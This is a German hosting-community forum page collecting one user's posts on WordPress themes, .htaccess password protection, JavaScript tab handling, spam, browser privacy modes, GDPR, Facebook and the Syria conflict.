kostenloser Webspace werbefrei: lima-city


Suche auf lima-city

  • in: welche Tastatur soll ich kaufen?

    geschrieben von mein-wunschname

    Ich habe eine HP 5187 (vor 4-5 Jahren mal gefunden). Die hat bisher noch keine erkennbaren Verschleißererscheinungen. Anschlag ist tief.
    https://images-na.ssl-images-amazon.com/images/I/91Tzi2zZpuL._SL1500_.jpg
  • in: Irgendwie ist dieses Forum tot

    geschrieben von mein-wunschname

    Hi Nutzer mit dem schwer zu merkenden Namen,
    hast du eventuell einen Filter gesetzt, der dir nur Beiträge der letzten x Monate anzeigt? Oder ist dieser Filter bei neuen Nutzern voreingestellt? Schau mal nach.

    Meine persönliche Theorie zur rückläufigen Forennutzung ist: Facebook frisst Foren auf, nicht nur bei Lima-City und vor allem solche Foren, die einen inhaltlichen Gemischtwarenladen anbieten.

    Ich persönlich fand das eigentlich bisher gar nicht so schlecht, dass man sich hier teilweise auch zu sehr spezifischen Fragen (wie geht das in PHP?) mal den einen oder anderen Codeschnippsel korrigieren lassen oder sich zu typischen Problemen für Webseitenbetreiber (letztens gerade die neue DSGVO) austauschen konnte.

    Ev. geht auch allgemein das Interesse daran zurück, eine individuelle Website zu erstellen.
  • in: Jugendreise

    geschrieben von mein-wunschname

    Zum Thema Babysitter gibt es hier
    https://www.betreut.de/magazin/kinder/wie-alt-sollte-ein-babysitter-sein-160/
    einige Ausführungen.
    Zum Thema Gruppenleiter/Teamer bei bei Jugendreisen liest man immer wieder solche Sätze wie z.B.
    Du musst mindestens 18 Jahre alt sein. Dir wird bei einer Betreuungstätigkeit die Verantwortung über eine Gruppe von Kindern übertragen. Und diese kannst du laut Gesetz erst übernehmen, wenn du volljährig bist.

    https://www.jugendtours.de/jugendreisen/betreuerportal/
    Die konkreten gesetzlichen Regelungen werde nicht genannt. Es könnte in einen Zusammenhang mit §1, Abs.4 Jugendschutzgesetz geben. Dort wird festgelegt, wer erziehungsbeauftragt sein kann
    ...ist erziehungsbeauftragte Person, jede Person über 18 Jahren, soweit sie auf Dauer oder zeitweise aufgrund einer Vereinbarung mit der personensorgeberechtigten Person Erziehungsaufgaben wahrnimmt oder soweit sie ein Kind oder eine jugendliche Person im Rahmen der Ausbildung oder der Jugendhilfe betreut.

    Wie das nun aber wiederum zum Babysitten passt kann ich nicht erklären.

    Mir ist noch eine andere Situation bekannt. Da wurden bei einem Jugendreiseveranstalter auch Leute unter 18 beschäftigt, aber nicht als Gruppenleiter, sondern als Animateure. Die haben dann de facto zwar oft das gleiche gemacht wie die Gruppenleiter, hatten aber nicht die Verantwortung (und bekamen auch deutlich weniger Geld)
  • in: WebSite übersetzen

    geschrieben von mein-wunschname

    Um Google Translate richtig in die eigene Website einzubauen muss man, glaube ich jedenfalls, hier
    https://translate.google.com/manager/website/?hl=de
    einsteigen. Man benötigt also ein Google Konto.

    Microsoft bietet ein vergleichbares Produkt an
    https://www.bing.com/translator
    Auch hier benötigt man für den Einbaucode in die Website ein Konto

    Die Ergebnisse sind übrigens bei beiden ziemlich ähnlich, zumindest für Standardtexte und in Bezug auf Deutsch/Englisch. Bei Deutsch/andere Sprache wird es dann schon manchmal lustig. Die Anfangsstrophe eines sehr bekannten Gedichtes ergibt bei Deutsch->Chinesisch und wieder zurück
    Da ist ein alter Schamane
    Aber sobald du gehst!
    Jetzt sollte sein Geist sein
    Ich lebe auch nach meinen Wünschen.
    Seine Worte und Werke
    Ich realisierte und Brauch
    Und da ist geistige Kraft
    Ich habe auch ein Wunder geschaffen.


  • in: Sollte ich beim designen bestimmte Browser nicht beachten?

    geschrieben von mein-wunschname

    Deine Frage ist im Grunde genommen schon uralt, denn solange es unterschiedliche Browser gibt setzen diese die Standards unterschiedlich (d.h oft auch: gar nicht) um. Früher kursierten unter Freaks die neuesten Browserhacks für IE 4; 5, 5.5 usw.

    Heute ist die Welt sogar noch viel bunter (uneinheitlicher) geworden durch die mobilen Browser, die ja nicht immer und automatisch das Gleiche können wie ihre Desktop Brüder.

    Nachdem ich früher viel Zeit mit den erwähnten Browser-Hacks und browser-spezifischen CSS-Code (inbes. für IE) verbracht habe sage ich mir heute:

    - eine Website muss immer bedienbar sein, dass betrifft vor allem die Navigation und die Lesbarkeit, eventuell noch Formulare.
    - auf die allerneuesten CSS-Trends verzichte ich in der Regel,
    - das ganze Microsoft-zeug nehme ich nicht sonderlich ernst
  • in: Pfad zu ImageMagick

    geschrieben von mein-wunschname

    cayce schrieb:
    ...

    Da meine Bilder aber vor meinem Upgrade funktioniert haben, braucht es ImageMagick aber anscheinend nicht unbedingt.


    Hier
    https://www.mediawiki.org/wiki/Manual:Image_administration#Image_thumbnailing
    kann man dazu lesen:
    Image thumbnailing requires either ImageMagick or GD library

    und
    Caution: MediaWiki 1.17 requires at least version 6.5.6-2 of ImageMagick.

    In newer versions this is not required.
  • in: Wordpress full-width seitenfüllent machen

    geschrieben von mein-wunschname

    darvin schrieb:
    ...Mobil: Sehr schlimm)




    Mobil - ist sehr unbestimmt, konkretes Gerät & Bildschirmgröße sollte man schon wissen
    Sehr schlimm - ist auch recht unspezifisch, ich hab mal mit einem Galaxy Tab a6 getestet und nichts gefunden

    Man kann mit den Web-Entwickler-Werkzeugen (Chrom bzw. FF) sehr schön herausfinden, welche CSS-Anweisungen das Aussehen eines bestimmten HTML-Elementes (bzw. Klasse bzw. ID) beeinflussen. Mit diesen Werkzeugen kann man diese Eigenschaften soagr zunächst temporär ändern oder deaktivieren und so die Wirkung vorab testen, sogar bei verschiedenen Bildschirmgrößen.

    Es übrigens nicht empfehlenswert, diese direkt in den CSS-Dateien des Orginal-Templates zu ändern. Entweder man erstellt ein Child-Theme oder man fügt benutzerdefinierten CSS-Code ein. Solange man derartiges prüft und testet sollte man die Cache-Plugins deaktivieren.
  • in: Spam Phänomen

    geschrieben von mein-wunschname

    Das mit der Wellentheorie könnte passen. Die Betreffs waren auch immer sehr ähnlich: Bitcoin, Viagra, Millionär waren so die häufigsten Stichworte.
  • in: Spam Phänomen

    geschrieben von mein-wunschname

    Ich habe bei einem E-Mail Anbieter (konkret GMX) schon sehr lange eine E-Mail-Adresse. da bleibt es natürlich nicht aus, dass man auch Spam-Mails erhält. Auf Grund der Filtereinstellungen landet ein großer Teil im Spam-Ordner, ich erhalte täglich nur eine Übersicht zu den neuen Mails in diesem Ordner.
    Schon seit mehreren Monaten war das SPAM-Aufkommen immer etwa 15-20 Stück am Tag, es waren immer etwa 100-120 Mails im Spam-Ordner.
    Seit etwa 1 Woche sind es nur noch 1-3 Spam-Mails am Tag, oft sind dabei auch noch solche Mails, die gar kein Spam sind.
    Ich will mich gar nicht darüber beklagen, dass ich jetzt viel weniger Spam erhalte. Aber ich wüsste gern, wie das zusammenhängt. Wurde ein Spam-Netzwerk zerschlagen? Wurde meine Adresse als filtergeschützt erkannt?
    Hat jemand etwas ähnliches beobachtet und/oder eine Erklärung?
  • in: Wordpress -> Anzeigen(Widget), wenn Beitrag aktualisiert

    geschrieben von mein-wunschname

    muellerlukas schrieb:
    mein-wunschname schrieb:
    Ich habe dazu mal etwas herum recherchiert und - nichts gefunden.

    Ähm: https://wordpress.org/plugins/last-updated/


    Oooh, vermutlich wurde das Plugin bei meiner Suche im Admin Interface so weit hinten angezeigt, dass ich es übersehen habe. Man sollte aber auf jeden Fall beachten:
    This plugin hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.

    Die Website des Erstellers ist übrigens tot. Man muss sich also ggf. selbst kümmern.

    Ich habe es mal kurz mit WP 4.9.5 getestet, da funktioniert es.
  • in: Wordpress -> Anzeigen(Widget), wenn Beitrag aktualisiert

    geschrieben von mein-wunschname

    Ich habe dazu mal etwas herum recherchiert und - nichts gefunden. Der Grund ist vermutlich, dass sich im Allgemeinen niemand dafür interessiert, ob und wann ein Uralt-Artikel aktualisiert wurde.

    Hier
    https://marketing-zauber.de/blogartikel-aktualisieren/
    beschreibt jemand, wie er/sie bei Artikelaktualsierungen vorgeht und hier
    https://blog.officemanager.de/2012/05/wordpress-aktualisierungsdatum/
    wie man überhaupt das Aktualisierungsdatum sichtbar macht. Beides ist nicht sehr befriedigend. Bleibt eigentlich nur:

    - selbst ein Widget-Plugin zu schreiben, allerdings ist selbst das nicht so einfach, denn ich habe in der WP-Funktionsreferenz (https://codex.wordpress.org/Function_Reference) nichts sinnvolles gefunden, was sich verwenden lässt
    - einfach das Veröffentlichungsdatum zu ändern und dann das Widget Neueste Beiträge zu nutzen.
  • in: WP Designe ohne Scrolling

    geschrieben von mein-wunschname

    Ok, ich habe mal auf einem Testwebspace ebenfalls das Theme Bulk installiert. Das sieht so aus:

    https://10437.lima.zone

    Ich habe keine speziellen Themeeinstellungen vorgenommen. Es gab aber vorher schon ein paar Testbeiträge. Daher werden jetzt auf der Startseite zu diesen Beiträgen jeweils die Anfänge angezeigt. Das ist typisch für Wordpress, weil das ja eigentlich eine Blogsoftware ist, d.h. man schreibt ständig neue Artikel, die dann jeweils auf der Startseite angezeigt werden.

    Man kann WP auch anders einrichten, z.B. so, dass als Startseite eine bestimmte Seite angezeigt wird (geht über Customizer>>Startseiteneinstellungen)
  • in: WP Designe ohne Scrolling

    geschrieben von mein-wunschname

    internetplattform schrieb:
    ...
    habe nun paar designe von wp angeschaut, welce bei wp dabei sind.
    aber bei allen, wenn man aufs menü klickt, mss man scrollen.
    also wo und wie kann ich dies in wp dies anpassen


    Es gibt anscheinend Missvertändnisse darüber, was du genau mit Scrollen meinst, z.B.

    turmfalken-nikolai schrieb:
    Ich nutze beispielsweise das Theme Flat Sky. Da kann ich auch ein normales Menü einrichten von dem aus ich in die Unterseiten komme. Scrollen läßt sich allerdings nicht immer verhindern da man ja auf jede Seite soviel Inhalte packen kann dass das nicht mit einem Mal anzuzeigen ist ohne das man scrollt.

    ...


    Daher wäre es gut, wenn du mal etwas konkreter wirst. Hast du WP bereits irgendwo mal installiert?

    Schau dir einfach mal die Website vom User turmfalken-nikolai an:https://turmfalken-nikolai-spandau.de/
    Dort wird, wie schon erwähnt, das Theme Flat Sky benutzt
  • in: WP Designe ohne Scrolling

    geschrieben von mein-wunschname

    Der Unterschied hat eigentlich gar nichts mit Wordpress zu tun. Man kann bei jeder beliebigen Seite Links so anlegen, dass sie entweder zu einer neuen Einzelseite führen oder zu einem bestimmten Abschnitt auf der gleichen Einzelseite. falls in letzterem Fall nicht einfach nur gesprungen wird, sondern sanft gescrollt, dann ist einfach nur noch etwas JavaScript im Einsatz.
    Da in letzter Seite sogenannte Singel-Page-Website stark in Mode gekommen sind gibt es auch vermehrt WordPress-Themes, die das unterstützen. Es dürfte aber in den seltensten Fällen so sein, dass so ein WordPress-Theme nur für eine Single-Page-Website ausgelegt ist.
    Insofern ist es dann (wie tchab ja schon schrieb) wirklich meist eine Frage des Menüaufbaus bzw. der Verlinkung.

    Ich würde dir übrigens empfehlen, nicht ewig auf den unterschiedlichsten Websites herumzuwühlen, um ein passendes Theme zu finden, sondern einfach die WordPress Möglichkeit unter Design>>Themes>>Hinzufügen zu nutzen.
    Da gibt es auch eine Vorschaufunktion.

    Beinahe wichtiger als die Auswahl des Themes ist die Anpassung des selben. Fast alle Theme haben heute mehr oder weniger umfangreiche Anpassungsmöglichkeiten. Zusätzliche Möglichkeiten der Gestaltung ergeben sich durch die Installation von Plugins und zusätzlichen CSS-Code.
  • in: Nach gelöschtem Tab automatisch zum Ursprung zurück springen

    geschrieben von mein-wunschname

    tchab schrieb:
    horstexplorer schrieb:
    JS bietet ja einige Möglichkeiten Tabs zu öffnen und zu schließen und diese zu benennen.
    https://www.mediaevent.de/javascript/Javascript-Window-Objekt-Methoden.html
    Dann gibt es die Funktion Focus()
    https://www.w3schools.com/jsref/met_win_focus.asp

    Note: This method makes a request to bring the current window to the foreground. It may not work as you expect in all browsers, due to different user settings.

    Kann also funktionieren, oder eben nicht. Ich würde stark vermuten daß es bei den meisten Browsern nicht mehr funktionieren sollte, kann man ja viel Mist mit bauen. Ob das auch auf bereits offenen Tabs funktioniert...

    Dann müsstest in dem neuen Tab der geöffnet wurde mit onunload den Fokus nur wieder auf die Original Seite setzen. Oder halt irgendwie dahinter kommen, dass der Tab geschlossen wurde damit es sich selbst in den Vordergrund schiebt.
    https://www.w3schools.com/jsref/event_onunload.asp

    Da könnte man sich hier das mal ansehen, von der Idee passt das ganz gut.
    https://stackoverflow.com/questions/10982593/open-link-in-new-window-or-focus-to-it-if-already-open?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa




    Wieso negativ? Funktioniert doch wenn man es so zusammen baut?
    Main.html
    <body>
    
    <script>
    function openWindow()
    {
    this.name = "seite1";
    window.open('./Child.html','seite2');
    window.focus();
    }
    </script>
    
    <a href="" onclick="javascript:openWindow();return false;">I bims eins Weiterleitung</a>
    
    </body>

    Child.html
    <body onunload="goback()">
    
    <script>
    function goback()
    {
    window.open('', 'seite1').focus();
    window.close();
    }
    </script>
    
    <p>I bims eins weitere Website</p>
    <a href="" onclick="javascript:goback();return false;">Zurüüüüück</a>
    
    </body>


    //edit
    Zum testen:
    >>https://horstexplorer.lima-city.de/JavaScript/Tab/<<

    onunload funktioniert nicht immer, vermutlich wegen den Eigenschaften
    onunload occurs when the user navigates away from the page (by clicking on a link, submitting a form, closing the browser window, etc.).


    Funktioniert weder in Firefox noch Edge. Haste ja toll getestet. ;)


    Komisch, bei mir funktioniert es im FF.

    Es bleiben aber aus meiner Sicht 2 Fragen:
    * was ist mit dem ganzen Smartphone-Browser-Zoo?
    * und noch einmal grundsätzlich: warum will man den Webseitenbesucher bevormunden? Das Öffnen und Schließen von Fenstern und Tabs sollte auf allen Websites gleich funktionieren. Wenn mir das, was mein Browser generell macht nicht gefällt ändere ich seine Einstellungen oder installiere einen anderen.
  • in: Privat oder Incognito

    geschrieben von mein-wunschname

    horstexplorer schrieb:
    ...
    An sich scheint der von FF Tracker und ähnliches zu blockieren, Chrome hingegen löscht die Webdaten beim beenden nur.


    Das könnte es sein!

    tchab schrieb:
    Soweit ich weiß versucht Firefox im privaten Modus Tracker zu blockieren. Das könnte als Adblock Maßnahme gesehen werden.

    Liest du die Bild eigentlich freiwillig? :shaft:


    3 x darfst du raten. Konkret ging es mir um mögliche Konsequenzen für die geplante ePrivacy-Verordnung der EU. Da habe ich einfach Seiten aufgesucht, von denen ich annehme, dass sie viel besucht sind. Ich hätte auch spon.de nehmen können, Die meinen im FF-Privatmodus, dass ich meinen Adblocker deaktiveren soll.
  • in: Privat oder Incognito

    geschrieben von mein-wunschname

    Ich benutze zu 95% den FF-Browser, Chrome entsprechend seltener, die Browser von MS nur ausgesprochen selten. Schon vor langer Zeit ist mir aufgefallen, dass bild.de den privaten Modus des FF blockiert. Heute ist mir zufällig aufgefallen, dass das beim Inkognito-Modus des Chrome nicht der Fall ist. Ich war bisher davon ausgegangen, dass Inkognito-Modus Chrome = privater Modus FF. Das ist ja anscheinend nicht der Fall. Kennt jemand die Unterschiede?
  • in: Nach gelöschtem Tab automatisch zum Ursprung zurück springen

    geschrieben von mein-wunschname

    target=“_blank wird ohnehin von vielen als Bevormundung empfunden.

    Wenn ich hier von dieser Seite aus Mukerbude öffne mit Rechte MT>>Link in neuem Tab öffnen klicke, dann öffnet sich genau rechts neben diesem Tab ein neuer mit der Mukerbude und wird aktiv. Wenn ich die Mukerbude schließe wird wieder dieses Fenster aktiv (alles mit FF Desktop).

  • in: Traffic vs Traffic

    geschrieben von mein-wunschname

    invalidenturm schrieb:
    darvin schrieb: ...Ich denke, ihr seid auch die einzigen Besucher.
    Nun Besucher kommen nicht von heute auf morgen, wenn es sich dann noch um eine Second-Level Domain wie darvin.lima-city.de handelt, ist es nochmal schwieriger Besucher anzulocken oder in Suchmaschinen oben aufzutauchen.


    Das sehe ich ähnlich. Man braucht schon einen langen Atem, heute allerdings noch mehr als vor 5 oder gar 10 Jahren. Es ist einfach so, dass heutzutage selbst kleinste Inhaltsnischen schon besetzt sind. Als Newcomer muss man schon mal einen deutlichen Mehrwert bieten gegenüber den etablierten Webseiten. Warum sonst sollte Google eine neue Seite besser bewerten als eine bereits bestehende.

    Eine Website mit Produkt-Reviews zu Geräten, die man wirklich selbst getestet hat, hat einen Haken: man muss die Dinge ja selbst besitzen (mindestens zeitweilig darüber verfügen können). Das geht dann schnell ins Geld. Leute, die schon viel früher angefangen haben, wie z.B. Caschy (Carsten Knobloch) mit stadt-bremerhaven.de, bekommen heute oft die Produkte von Händlern/Herstellern zugeschickt und können sie eventuell noch über ebay verkaufen.

    Betrachte deine jetzige Webseite als Übungsobjekt und halte weiter Ausschau nach einem spannenden Nischenthema. Oft gilt allerdings der Spruch "Der frühe Vogel fängt den Wurm", denn was heute eine Nische ist, dass kann morgen schon ein absolutes Mainstream-Thema sein.
  • in: Microsoft Volljährigkeit | Account gesperrt

    geschrieben von mein-wunschname

    Und wie wird das überprüft? Mit Personaldokument?

    PS: Ich habe gerade gehört, dass auch WhatsApp seine Nutzungsbedingungen anpassen wird. Wenn ich das richtig verstanden haben, soll für Personen <16 Jahre auch die Zustimmung durch Erziehungsberechtigte nicht ausreichen.
  • in: Workaround für Serversperre

    geschrieben von mein-wunschname

    Ich hatte früher bei einem anderen (Free-)Anbieter das Problem, dass bestimmte Dateitypen im Umfang limitiert waren. Die habe ich damals in die Dropbox ausgelagert. Das könnte für dich auch eine Option sein.
  • in: Werbung bei CPanel Webspace

    geschrieben von mein-wunschname

    Was mit CPanel geht und was nicht kann ich nicht beurteilen. Prinzipiell denke ich, dass für dein Vorhaben ein vServer erforderlich ist, denn irgendwie muss du an die Konfiguration des Apache-Webserver heran.

    Früher wurde für so eine Art Zwangswerbung auf Webspace das Apache Modul mod_layout verwendet. Das gehört(e) aber nicht zum Apache-Standard.

    Als Modul der Apache-Standard Distribution könnte sich auch das Modul mod_sed eignen. Doku:
    https://httpd.apache.org/docs/2.4/de/mod/mod_sed.html

    Da könnte man dann auch für jeden Nutzer spezielle Konfigurationen festlegen.

    Für eventuelle Tests und Spielereien würde ich dir unbedingt empfehlen, eine Virtuelle Maschine mit geeigneter Software aufzusetzen.

  • in: Microsoft Volljährigkeit | Account gesperrt

    geschrieben von mein-wunschname

    Wie ist denn eigentlich genau die Anforderung? Kann das auch eine andere Person 18+ machen oder muss das immer einer der Erziehungsberechtigten sein?
  • in: Syrien, Skripal was haltet ihr vom ganzen?

    geschrieben von mein-wunschname

    turmfalken-nikolai schrieb:
    Also ich find es dennoch auffällig, das die Russen JEDE UN Resolution gegen Assad ...


    Ja, man hat aus den Ereignissen zu Libyen gelernt. So war es 2011

    http://www.spiegel.de/politik/ausland/uno-abstimmung-sicherheitsrat-billigt-militaereinsatz-gegen-libyen-a-751631.html

    Seitdem ist Libyen ein "Gescheiterter Staat"

    turmfalken-nikolai schrieb:
    ...zum Thema Syrien allgemein blockieren!

    Stimmt nicht, ganz aktuelles Beispiel
    http://www.un.org/depts/german/sr/sr_sonst/s18-355.pdf

    Wer sich einen Überblick verschaffen will, der findet hier
    http://www.un.org/depts/german/sr/fs_sr_zwischenseite.html
    eine Übersicht über Resolutionen des UN-Sicherheitsrates.

    Edit: Links verbessert
  • in: .htaccess funktioniert beim Freespace nicht?

    geschrieben von mein-wunschname

    Dann verschiebe sie mal in das Verzeichnis

    Edit: ist zwar hier jetzt OT, aber trotzdem mal die Frage: Ist das eigentlich legal, was du da auf deiner Website machst? Ich würde dir empfehlen, das noch einmal genau zu prüfen.
  • in: Syrien, Skripal was haltet ihr vom ganzen?

    geschrieben von mein-wunschname

    Eigentlich bin ich meistens nicht so begeistert, wenn man in einer Forendiskussion auf YT-Videos verweist, aber dieser Politiker

    arbeitet in wenigen Sekunden das Wesen des (Vergeltungs-)Angriffs seitens der USA, Frk und Gb auf Syrien gut heraus. Na gut, also die letzten 15 Sekunden müssten nicht sein.

    Kleiner Nebeneffekt noch: Man sieht mal (gleich ganz zu Anfang), wie groß das Interesse der Abgeordneten bei solchen Themen ist.
  • in: Datei mit Passwort sichern

    geschrieben von mein-wunschname

    Ich hatte mal irgendwo gelesen, dass man bei
    AuthUserFile

    immer den vollständigen Pfad angeben muss, also etwa
    /home/webpages/lima-city/nutzername/passwords/.htpasswd

    Diese Variante funktioniert bei mir. Meine Test-.htaccess sieht so aus:
    <FilesMatch "protected.html">
      AuthType Basic
      AuthName "Geschützter Bereich"
      AuthUserFile /home/webpages/lima-city/mein-wunschname/passwords/.htpasswd
      require valid-user
    </FilesMatch>

    Man sollte ohnehin die Datei .htpasswd nicht im gleichen Verzeichnis ablegen wie die Webseiten-Dateien.

    Edit: Habe gerade noch einmal nachgesehen, auch die Lima-Hilfe geht vom vollst. Pfad aus
    https://www.lima-city.de/hilfe/wie-kann-ich-ein-verzeichnis-mit-einem-passwort-schuetzen
  • in: Syrien, Skripal was haltet ihr vom ganzen?

    geschrieben von mein-wunschname

    Nachdem ich heute beim DLF gehört und gelesen habe:
    Frankreich besorgt über Lage in Idlib
    Nach der Rückeroberung der einstigen Rebellenhochburg Duma durch die syrische Armee wächst die Sorge um die Menschen in der Provinz Idlib.
    Dorthin waren die Rebellen aus Duma abgezogen und es gibt Befürchtungen, dass Idlib das nächste Ziel der syrischen Regierungstruppen sein könnte.
    http://www.deutschlandfunk.de/syrien-frankreich-besorgt-ueber-lage-in-idlib.1939.de.html?drn:news_id=872133

    ging mir durch den Kopf, dass das, was in Duma geschah, nicht das letzte Ereignis dieser Art gewesen sein dürfte. Immerhin ist "Idlib ... die letzte Region, die noch weitgehend unter der Kontrolle von Aufständischen steht." (ebenda)
    Sonst ist immer von Rebellen die Rede, jetzt also Aufständische. Na gut, sei's drum.
    Die Hauptstadt der Region wird vollständig von Haiʾat Tahrir asch-Scham (HTS), die Provinz insgesamt in weiten Teilen von HTS kontrolliert, also vom syrischen Zweig von al-Qaida.
    Also wenn Assad & Co. die Region erobern, dann brauchen die al-Qaida-Leute woanders Obdach und Betätigungsfeld.
    Hoffen wir mal, dass sie dann nicht als Flüchtlinge nach D kommen.
  • in: Syrien, Skripal was haltet ihr vom ganzen?

    geschrieben von mein-wunschname

    invalidenturm schrieb:
    ...
    Von der OPCW werden wir hören, dass sie leider nicht ermitteln konnte, weil ja Krieg ist und in 3-4 Tagen ist alles verflogen was eine spätere Klärung unmöglich macht. Und so wird das ganze wie immer nie geklärt werden.


    Sarin ist bis zu 6 Wochen nach dem Kontakt im menschlichen Körper nachweisbar. Wenn es einen solchen Kontakt gab, dann wäre es noch nicht zu spät.
    Erstaunlicherweise widersprechen sich die Meldungen aber im Hinblick auf die eingesetzte Substanz. Anfangs (8.4.) wurden eindeutig Symptome von Nervengas diagnostiziert:
    Die Menschen hätten unter Atemnot gelitten und Herzprobleme gehabt, was typische Anzeichen für Nervengas seien.
    (Quelle:bento)

    Später war dann häufiger von Chlorgas die Rede. Chlorgas ist in gewisser Hinsicht "günstiger", weil es als in der chemischen Industrie breite Anwendung findet und nicht in der Art und Weise unter das Chemiewaffenverbot fällt wie Sarin. (Das war bei dem Agent Orange in Vietnam ähnlich: keine chemische Waffe, weil Wirkstoffe zum Einsatz kamen, die auch in Herbiziden verwendet werden). Chlorgas lässt sich als normaler Grundstoff der chemischen Industrie relativ einfach beschaffen.
    Der Nachweis des Einsatzes von Chlorgas wäre dann wohl sinnvoller über Exhumierung der Opfer und deren pathologischer Untersuchung (Lungenschäden) zu führen. Bilder mit Kindern, die Atemmasken auf dem Mund haben, reichen als Beweis nicht aus.

  • in: FTP Login Probleme aktuell?

    geschrieben von mein-wunschname

    ja, das scheint ein allgemeines Problem zu sein:
    Ein Fehler ist aufgetreten

    Konnte keine Verbindung zum FTP-Server nutzername.lima-ftp.de auf Port 21 herstellen.

    Bitte prüfe die Adresse des FTP-Servers - diese unterscheidet sich oft von der Adresse des HTTP-(Web-)Servers. Bitte kontaktiere den Support.
  • in: Wird Facebook in Zukunft besser mit den Daten umgehen?

    geschrieben von mein-wunschname

    Bei Facebook kann man sich abmelden, bei seiner Kommune aber nur ummelden, also ich meine, man ist immer irgendwo erfasst. Dazu passt dann
    In der Debatte über den Handel mit persönlichen Daten hat der Städte- und Gemeindebund den Kommunen empfohlen, mit ihren Datenbeständen ebenfalls Geld zu verdienen. „Auch die Städte und Gemeinden müssen sich noch mehr klar machen, dass Daten das Öl des 21. Jahrhunderts sind und sich damit wichtige Einnahmen erzielen lassen“, sagte Hauptgeschäftsführer Gerd Landsberg der „Rheinischen Post“.

    Ausführlich
    http://www.faz.net/aktuell/wirtschaft/diginomics/kommunen-sollen-daten-der-buerger-verkaufen-15533156.html
  • in: Pfad zu ImageMagick

    geschrieben von mein-wunschname

    horstexplorer schrieb:
    sapwickler schrieb:
    Danke für die Rückmeldung,

    also laut https://system.lima-city.de/info.php ist ImageMagick installiert. Nur den Pfad entdecke ich nicht =( Oder seh den Wald vor lauter Bäumen nicht.
    Ist auch kein grundsätzliches Problem, da ja alles gut funktioniert. Ist nur Finetuning =)

    Jo, ImageMagick ist tatsächlich da aber nen Pfad finde ich auch nicht. Das Internet sagt dazu /usr/bin/convert aber wie das bei Lima aussieht...
    Evtl kann man die open_base dir's mal durch sehen ob da etwas bei ist auf dem eigenen Webspace.


    Also bei den beiden Webspace-Anbitern, bei denen ich das jetzt mal schnell prüfen konnte ist es auch
    /usr/bin/convert

    Einfach mal probieren & testen und ansonsten Support direkt anfragen
  • in: Wird Facebook in Zukunft besser mit den Daten umgehen?

    geschrieben von mein-wunschname

    Wichtig für das Verstandnis von Facebook ist aus meiner Sicht erst einmal folgende Einsicht: Die Kunden von Facebook sind nicht die Nutzer sondern diejenigen, die auf Facebook werben. Die Facebook-Nutzer sind mehr so eine Art Material, das benutzt wird.

    Constanze Kurz, die Sprecherin des CCC, hat vor kurzem noch einmal darauf hingewiesen, dass M.Zuckerberg zugegeben hat, die die Bewältigung der Datenschutzprobleme ein sehr langfristige Angelegenheit sein wird (die Rede war bei Z. von einigen Jahren). Das deute sehr stark darauf hin, dass man bei Facebook an die Grenzen des technisch Beherrschbaren gestoßen sei.
    F sitzt nun gewissermaßen in der Klemme. Einerseits drohen empfindliche Strafen (in der EU) für schlechte Behandlung des Materials, andererseits wollen die Kunden Daten sehen.
    Die Kursentwicklung der FB-Aktie hat gezeigt, wie sensibel Kunden und Aktionäre von FB sind. Kann sein, dass FB in 5 Jahren in einer Reihe mit CompuServe, Yahoo odeer AOL steht, kann aber auch sein, dass das Unternehmen noch mehr Macht hat als je zuvor. Dies aber nicht durch die Gewinnung von noch mehr Nutzern, sondern durch neue Geschäftsfelder.
  • in: Einfach Vokabeln lernen

    geschrieben von mein-wunschname

    Vokabeln lernen kann man trainieren. Eine alle "glücklich" machende Methode gibt es aber nicht. Die muss jeder für sich heraus finden. Ein paar Anregungen:
    1) für Vokabeln aus dem Alltagsleben überall in der Wohnung post-it-Zettel mit den jeweiligen Worten der Zielsprache ankleben
    2) Karteikärtchen; die jeweils auch mit Anwendungsbeispielen. Die Karten immer in der Gesäßtasche bereit
    3) Methode 1) mit 2) kombinieren für die Wörter, die man sich einfach nicht merken kann, also post-its mit den schwierigen Wörtern
    4) das Programm Anki (für PC und Android und online kostenlos) ist so eine Art Zettelkastenprogramm. Sogenannte Decks (Vokabelsammlungen) kann man sich selbst zusammenstellen oder die von anderen zusammengestellten herunterladen
    5) Vokabeln nicht im Sitzen lernen sondern dabei gehen
    6) sich die Wörter vorstellen, genauer gesagt das jeweilige Schriftbild
    7) im Zusammenhang lernen, also nicht nur das einzelne Wort sondern Sätze oder Redewendungen
    8) wiederholen, wiederholen...; dabei ist das von mir erwähnte Anki gut, weil es auch die Vokabeln wieder rauskramt, die man schon als gelernt markiert hat; die nicht gelernten sowieso
    9) nicht versuchen, an einem Tag 50 Vokabeln zu lernen, besser an jedem Tag 10
    10) zu zweit lernen, sich abfragen; ist für mich eine der erfolgreichsten Methoden, wenn man den richtigen Partner hat
    11) nicht so viele sinnlosen Forenbeiträge schreiben sondern die Zeit mit dem Lernen von Vokabeln nutzen

    Ich hoffe, dass du deine Frage nicht gestellt hast, weil du demnächst Abiturprüfung hast. Um das Lernen zu erlernen würde dir nicht mehr viel Zeit bleiben.

    Edit: Ein paar orthos gekillt
  • in: Bereich auf mehreren Seiten unterschiedliche Farben

    geschrieben von mein-wunschname

    Es ist immer schwierig, Darstellungsprobleme auf HTML-Seiten nur anhand von Screenshots zu untersuchen.

    Ich weiß nicht, welchen Browser du benutzt, aber (fast) jeder Browser hat sogenannte Entwicklungswerkzeuge an Board. Mit dem Firefox kann man diese mit Strg+Umschalt-c aufrufen. Dann sieht man den Inspektor, mit dessen Hilfe man erkunden kann, welche CSS-Eigenschaften einem bestimmten HTML-Element zugeordnet sind.

    Ich habe mal einem Blick in den Quellcode deiner neuen Seite (www.peterskosmos.de/NuMuBu/) geworfen. Da ist mit aufgefallen, dass der HTML-Code eine ganze Reihe von Fehlern enthält
    http://validator.w3.org/check?verbose=1&uri=https%3A%2F%2Fwww.peterskosmos.de%2FNuMuBu%2F
    Oftmals sind Kommentare nicht richtig gekennzeichnet. Ein HTML-Kommentar geht so

    <!--LEERZEICHEN Kommentartext LEERZEICHEN-->


    siehe auch https://wiki.selfhtml.org/wiki/HTML/Regeln/Kommentar

    Außerdem gibt es eine Reihe von Verschachtelungen von HTML-Elementen, die nicht zulässig sind.

    <h3>Bla bla
    <h4>blub</h4>
    </h3>


    ist falsch,richtig ist

    <h3>Bla bla</h3>
    <h4>blub</h4>


  • in: Umsetzung der Datenschutzgrundverordnung

    geschrieben von mein-wunschname

    invalidenturm schrieb:
    Ich habe da mehr an eine Lösung für die nicht Wordpress Nutzer gedacht. In Wordpress benutze ich das Plugin Cookie Notice.


